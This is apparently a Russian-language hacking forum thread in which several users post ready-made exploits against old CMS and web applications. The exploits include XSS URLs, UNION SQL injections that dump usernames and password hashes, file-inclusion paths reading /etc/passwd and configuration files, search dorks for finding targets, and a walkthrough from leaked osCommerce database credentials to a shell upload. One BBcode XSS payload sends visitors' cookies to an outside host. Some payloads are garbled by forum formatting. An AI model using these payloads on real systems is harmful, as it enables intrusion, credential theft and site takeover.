[SLITE]

e107 [[Для просмотра данной ссылки нужно зарегистрироваться]] [[Для просмотра данной ссылки нужно зарегистрироваться]]

V. 0.7.5 XSS http://site.com/search.php?q=&r=0&s=Search&in=1&ex=1&ep= %27%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript % 3E&be=1&t=1&adv=1&type=all&on=new&time=any&author =

XSS при обработке BB

Код HTML:

&*91;color=*EFEFEF&*93;&*91;url&*93;www.ut&*91;url= http://www.s=''style='font-size:0;color:* EFEFEF'style='top:expression(eval(this.sss)); 'sss=`i=new/**/Image(); i.src='http://www. milw0rm.com/cgi-bin/shell.jpg?'+document. cookie;this.sss=null`style='font-size:0;&*93;&*91;/url&*93;&*91;/url&*93;'&*91;/color&*93;

V. 0.615
SQL INJ http://site.com/content.php?content.99/* */UNION/**/SELECT/**/null,null,null, CONCAT(user_name,CHAR(5,user_email,CHAR(5,user _password),null,null,null,null,null,null, null,null,null/**/FROM/**/e107_user/**/ WHERE/**/user_id=1/*

[Для просмотра данной ссылки нужно зарегистрироваться], CONCAT(user_name,CHAR(5,user_email,CHAR(5,user _password), null,null,null,null,null, null,null,null,null,null,null%20FROM%20e107_user%2 0WHERE%20user_id=1/*

[Для просмотра данной ссылки нужно зарегистрироваться] l,null, CONCAT(user_name,CHAR(5,user_email,CHAR(5,user _password),null,null,null,null,null, null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/*

XSS http://site.com/e107_plugins/clock_menu/clock _menu.php?clock_flat=1&LAN_407=foo%22); //--%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

[Для просмотра данной ссылки нужно зарегистрироваться][xss code here]

PHP include http://site.com/e107_handlers/secure_img_render.php?p=http://site.com/shell.php

Joomla [[Для просмотра данной ссылки нужно зарегистрироваться]] [[Для просмотра данной ссылки нужно зарегистрироваться]]

V. 1.0.9

XSS http://site.com/search.php?q=&r=0&s=Search&in=1&ex=1&ep= %27%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript % 3E&be=1&t=1&adv=1&type=all&on=new&time=any&author =

Slaed CMS [[Для просмотра данной ссылки нужно зарегистрироваться]] [[Для просмотра данной ссылки нужно зарегистрироваться]]

V. 2 Lite
XSS в модуле Submit News <img src='javascript:alert(/1/)'

Data Life Engine [[Для просмотра данной ссылки нужно зарегистрироваться]] [[Для просмотра данной ссылки нужно зарегистрироваться]]

V. 1.3a5

SQL INJ [Для просмотра данной ссылки нужно зарегистрироваться][SQl code]

Mambo [[Для просмотра данной ссылки нужно зарегистрироваться]] [[Для просмотра данной ссылки нужно зарегистрироваться]]

V. 4.5.3h

SQL INJ http://site.com/index.php POST username=%27or+isnull%281%2F0%29%2F*&passwd=anypas sword&option=login&Submit=Login&op2=login
&*9001;=english&return=${file}&message=0

RUNCMS [[Для просмотра данной ссылки нужно зарегистрироваться]] [[Для просмотра данной ссылки нужно зарегистрироваться]]

V. 1.3a5
XSS http://site.com/public/modules/downloads/ratefile.php?lid={number}">[XSS code]

sPaiz-Nuke [[Для просмотра данной ссылки нужно зарегистрироваться]] [[Для просмотра данной ссылки нужно зарегистрироваться]]

V. 1.0.9
XSS http://site.com/modules.php?name=Articles&file=search&query=[XSS code]&type=articles&type=comments

lucidCMS [[Для просмотра данной ссылки нужно зарегистрироваться]] [[Для просмотра данной ссылки нужно зарегистрироваться]]

1.0.11
SQL INJ index.php?command=panel

Dragonfly CMS [[Для просмотра данной ссылки нужно зарегистрироваться]] [[Для просмотра данной ссылки нужно зарегистрироваться]]

9.0.6.1
XSS /index.php POST search=%22%3E%3Cscript%3Ealert%28%22wvs-xss-magic-string-${random}%22%29%3C%2Fscript%3E&topic=0&cat =0&news_search_comments=0&coppermine=

Nodez [[Для просмотра данной ссылки нужно зарегистрироваться]] [[Для просмотра данной ссылки нужно зарегистрироваться]]

V. 4.6.1.1
XSS http://site.com/index.php?node=system&op=block%3Cscript%3Ealert(%2 2wvs-xss-magic-string-${random}%22)%3C/script%3E&block=3&bop=more

XOOPS [[Для просмотра данной ссылки нужно зарегистрироваться]] [[Для просмотра данной ссылки нужно зарегистрироваться]]

V. 2.0.11
SQL INJ [Для просмотра данной ссылки нужно зарегистрироваться] POST <?xml version="1.0"?><methodCall><methodName>blogger.get UsersBlogs</methodName><params><param><value><string></string></value></param><param><value><string>any') or isnull(1/0)/*</string></value></param></params></methodCall></font>

SiteEnable [[Для просмотра данной ссылки нужно зарегистрироваться]]< [[Для просмотра данной ссылки нужно зарегистрироваться]]

V. 3.3
XSS [Для просмотра данной ссылки нужно зарегистрироваться]

PortalApp [[Для просмотра данной ссылки нужно зарегистрироваться]] [[Для просмотра данной ссылки нужно зарегистрироваться]]

3.3
XSS http://site.com/login.asp?ret_page=a%22%3E%3Cscript%3Ealert('XSS') %3C/script%3E%3C%22

PHP-Nuke [[Для просмотра данной ссылки нужно зарегистрироваться]] [[Для просмотра данной ссылки нужно зарегистрироваться]]

V. 6.0
XSS в поиске ><script>alert(document.cookie);</script>
V. 7.8
XSS http://site.com/?pagetitle=title
V. 7.8
SQL http://[target]/[path]/modules.php?name=Downloads &d_op=Add&url=[SQL]&title=what&description=what


[Для просмотра данной ссылки нужно зарегистрироваться][path]/modules.php?name=Web_Links & l_op=Add&title=what&description=[SQL]&url=what/font>
V. 6.x, 7-7.6
XSS http://[target]/[nuke_dir]/modules.php? name=Search&author=[author]&topic= 0&min=999999999[XSS code]&query=[our query]

[Для просмотра данной ссылки нужно зарегистрироваться][nuke_dir]/modules.php? name=Search&author=[author]&topic= 0&min=999999999[XSS code]&query= [our_query]&type=users&category=2

[Для просмотра данной ссылки нужно зарегистрироваться][nuke_dir]/modules.php? name=Search&author=[author]&topic= 0&min=999999999[XSS code]&query= [our_query]&type=comments&categ ory=2

V. 6.x, 7.2, 7.3
XSS http://site.com/modules.php?name=Reviews&rop=postcomment&id='<h1>X SS</h1&title =a

http://site.com/modules.php?name=Reviews&rop=postcomment&id='&titl e=<h1>XSS</h1>/font>

[Для просмотра данной ссылки нужно зарегистрироваться]

[baltazar]

Contrexx CMS

Код:

http://site/index.php?section=search&term=%22%20style=%22xss:expression(alert(document.cookie))

(ие)

Nucleus

Full path disclosure:

Код:

http://site/action.php?action=addcomment

SQL Injection(дб екзекушн):

Код:

http://site/action.php?action=addcomment

SQL Injection:

Уявизмости в [Для просмотра данной ссылки нужно зарегистрироваться] в параметрах itemid, myid.

XSS:
Пост запрос на [Для просмотра данной ссылки нужно зарегистрироваться]

Код:

"><script>alert(document.cookie)</script>

В параметрах: itemid, myid, remember

FtpLocate (<2.02)

XSS:
Уязвимости в скрипте flsearch.pl в параметрах all, query, nounix, sizemin, sizemax, sizeunit та sizebytes

Код:

http://site/cgi-bin/ftplocate/flsearch.pl?all=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&query=test

Код:

http://site/cgi-bin/ftplocate/flsearch.pl?query=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Код:

http://site/cgi-bin/ftplocate/flsearch.pl?query=test&nounix=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Код:

http://site/cgi-bin/ftplocate/flsearch.pl?query=test&sizemin=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Код:

http://site/cgi-bin/ftplocate/flsearch.pl?query=test&sizemax=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Код:

http://site/cgi-bin/ftplocate/flsearch.pl?query=test&sizeunit=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Код:

http://site/cgi-bin/ftplocate/flsearch.pl?query=test&sizebytes=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Код:

http://site/cgi-bin/ftplocate/flsearch.pl?query=test&sizebytes=%22%3E%3Cscript%3Edocument.location%3D'http://websecurity.com.ua'%3C/script%3E

(c)baltazar

Добавлено через 35 часов 39 минут

Envolution

XSS:
Уязвимости в user.php (в модуле NS-NewUser).

Код:

http://site/user.php?module=NS-NewUser&op=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Код:

http://site/user.php?uname=test&upass=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&upassverif=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&email=test@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser

Код:

http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Код:

http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&url=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Код:

http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&timezoneoffset=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Код:

http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_avatar=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Код:

http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_icq=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Код:

http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_aim=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Код:

http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_msnm=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Код:

http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_from=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Код:

http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_occ=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Код:

http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_intrest=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Код:

http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_sig=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Код:

http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&bio=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Код:

http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&agreetoterms=1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Код:

http://site/print.php?sid=0%2f%2a%3Cscript%3Ealert(document.cookie)%3C/script%3E

Код:

http://site/user.php?uname=test&upass=12345&upassverif=12345&email=test@test.com&agreetoterms=1&module=NS-NewUser&op=finishnewuser

Можно и через ГЕТ и через ПОСТ

Full path disclosure:
[Для просмотра данной ссылки нужно зарегистрироваться]
[Для просмотра данной ссылки нужно зарегистрироваться]
[Для просмотра данной ссылки нужно зарегистрироваться]
[Для просмотра данной ссылки нужно зарегистрироваться]
[Для просмотра данной ссылки нужно зарегистрироваться]
[Для просмотра данной ссылки нужно зарегистрироваться]
[Для просмотра данной ссылки нужно зарегистрироваться]
[Для просмотра данной ссылки нужно зарегистрироваться]
[Для просмотра данной ссылки нужно зарегистрироваться]
[Для просмотра данной ссылки нужно зарегистрироваться]
[Для просмотра данной ссылки нужно зарегистрироваться]
[Для просмотра данной ссылки нужно зарегистрироваться]
[Для просмотра данной ссылки нужно зарегистрироваться]
[Для просмотра данной ссылки нужно зарегистрироваться]
[Для просмотра данной ссылки нужно зарегистрироваться]
[Для просмотра данной ссылки нужно зарегистрироваться]
[Для просмотра данной ссылки нужно зарегистрироваться]
[Для просмотра данной ссылки нужно зарегистрироваться]
[Для просмотра данной ссылки нужно зарегистрироваться]
[Для просмотра данной ссылки нужно зарегистрироваться]
[Для просмотра данной ссылки нужно зарегистрироваться]
[Для просмотра данной ссылки нужно зарегистрироваться]
[Для просмотра данной ссылки нужно зарегистрироваться]
[Для просмотра данной ссылки нужно зарегистрироваться]
[Для просмотра данной ссылки нужно зарегистрироваться]
[Для просмотра данной ссылки нужно зарегистрироваться]
[Для просмотра данной ссылки нужно зарегистрироваться]
[Для просмотра данной ссылки нужно зарегистрироваться]
[Для просмотра данной ссылки нужно зарегистрироваться]
[Для просмотра данной ссылки нужно зарегистрироваться]

SQL Injection:

Код:

http://site/print.php?sid=-1%20union%20select%20null,null,pn_uname,pn_pass,null,null,null,null%20from%20envo_users%20limit%201,1

[~!Dok_tOR!~]

MiaCMS <= 4.6.5 Multiple Remote SQL Injection Vulnerabilities


Exploit 1:

Код:

index.php?option=com_content&task=view&id=-9999999+union+select+1,concat_ws(0x3a,username,password)+from+mia_users/*&Itemid=9

Exploit 2:

Код:

index.php?option=com_content&task=category&sectionid=doktor&id=-9999999+union+select+1,concat_ws(0x3a,username,password)+from+mia_users/*&Itemid=27

Exploit 3:

Код:

index.php?option=com_content&task=blogsection&id=-9999999+union+select+1,concat_ws(0x3a,username,password)+from+mia_users/*&Itemid=9

Opera -> Source(Ctrl+F3)

PHP код:

<div class="moduletable">

...

onclick="window.open('http://digg.com/submit?phase=3&amp;url='+encodeURIComponent(location.href)+'&amp;bodytext=This+site+uses+MiaCMS+-+the+free%2C+open+source+content+management+system+admin%3A21232f297a57a5a743894a0e4a801fc3&amp; 


admin:21232f297a57a5a743894a0e4a801fc3

[Для просмотра данной ссылки нужно зарегистрироваться][installdir]/administrator/

[Для просмотра данной ссылки нужно зарегистрироваться]

(c) ~!Dok_tOR!~

[baltazar]

yBlog



Локальный Инклуд:


Файл: pc.lib.php
Кусок уязвимого кода:

Код:

 if (!isset($g_pc_lib_dir))
    $g_pc_lib_dir = "lib";

...

  $g_pc_extension = "php";

  if (!defined("PCLERROR_LIB"))
  {
    include("data/inc/$g_pc_lib_dir/pclerror.lib.$g_pcltar_extension");
  }
  if (!defined("PCLTRACE_LIB"))
  {
    include("data/inc/$g_pc_lib_dir/pcltrace.lib.$g_pcltar_extension");

Код:

http://site/inc/lib/pc.lib.php?g_pc_lib_dir=../../../../../../../../../../../../../etc/passwd%00

SQL Иньекция:

Код:

http://site/search_results.php?cid=-1/**/union/**/select/**/1,version(),3,4,5,6--

XSS Иньекция:

Код:

http://site/yblog/user.php?n=<script>alert(/xss/)</script>

FuzzyLime CMS

SQL Иньекция:

Код:

http://site/shop_showcat.php?='%20UNION%20ALL%20SELECT%201,2,3,4,5,6,concat(username,':',passwrd)%20from%20users/*

Локальный Инклуд:
Файл:index.php :
Уязвимый кусок кода:

Код:

<?php readfile($Root.$Path); ?> <---[xxx]
<form action="application_loader.php" method="post">

Код:

http://site/index.php?Root=../../../../../../etc/password

Код:

http://index.php?Path=../../../../../../etc/password

XSS:

Код:

http://site/login.php?url=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

[ErrNick]

Pixie CMS

XSS ----->>>

Код:

pixie/?s=blog&m=permalink&x=XSS

[baltazar]

0scommerce

Смотрим файл extras/update.php:

Код:

include '../mysql.php';
//if a readme.txt file exists, display it to the user
if(!$read_me) {
  if(file_exists('readme.txt')){
    $readme_file = 'readme.txt';
  }
  elseif(file_exists('README')){
    $readme_file = 'README';
  elseif(file_exists('readme')) {
    $readme_file = 'readme';
  }
if($readme_file) {
              $readme = file($readme_file);
              print "<CENTER><TABLE BORDER=\"1\"WIDTH=\"75%\"CELLPADDING=\"2\"
              CELLSPACING=\"0\"><TR BGCOLOR=\"*e7e7cc\"><TD>\n";
              print nl2br(htmlentities(implode($readme, ' ')));
              print "<HR NOSHADE SIZE=\"1\"><CENTER><A  
              HREF=\"update.php?read_me=1\"><B>Continue</B></A></CENTER>\n";
              print "</TD></TR></TABLE>\n";
              exit;
           }
}

Сразу скажу что дорк для баги будет inurl: extras/update.php
т.е.: [Для просмотра данной ссылки нужно зарегистрироваться]

Дальше:

Код:

 ?read_me=0&readme_file=../catalog/includes/configure.php

:

Код:

http://site.com/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php

Если все будет хорошо, то мы увидим,что-то типа:

Цитата:

define('DB_SERVER_USERNAME', 'olololo');
define('DB_SERVER_PASSWORD', 'xaknetru');
define('DB_DATABASE', 'olololo');

Далее идем на site.com/catalog/admin/ смотрим на вкладку "Файлы", спокойно загружаем наш шелл, который будет помщен в папку резервного копирования, что-то типа:

Код:

http://site.com/catalog/backupsmdb/back_mdb_12_05_09.php

[ErrNick]

Php-Nuke
friend.php?op=FriendSend&sid=SQL

exploit

Код:

friend.php?op=FriendSend&sid=-1+union+select+group_concat(aid,0x3a,pwd)+from+nuke_authors

[ErrNick]

RunCMS local file includes

DORK:inurl:"modules/incontent/index.php?op="
exploit:
[Для просмотра данной ссылки нужно зарегистрироваться]

demo:
http://127.0.0.1/modules/incontent/index.php?op=imp&option=0&url=../../../mainfile.php

© ErrNick

[Pin4eG]

ErrNick, а какие версии уязвимы? В стандартной сборке версии 2.1 такого модуля нет.

[mihas]

Цитата:

Сообщение от Pin4eG

ErrNick, а какие версии уязвимы? В стандартной сборке версии 2.1 такого модуля нет.

Перепроверил в RunCMS 2.1 такого модуля несуществует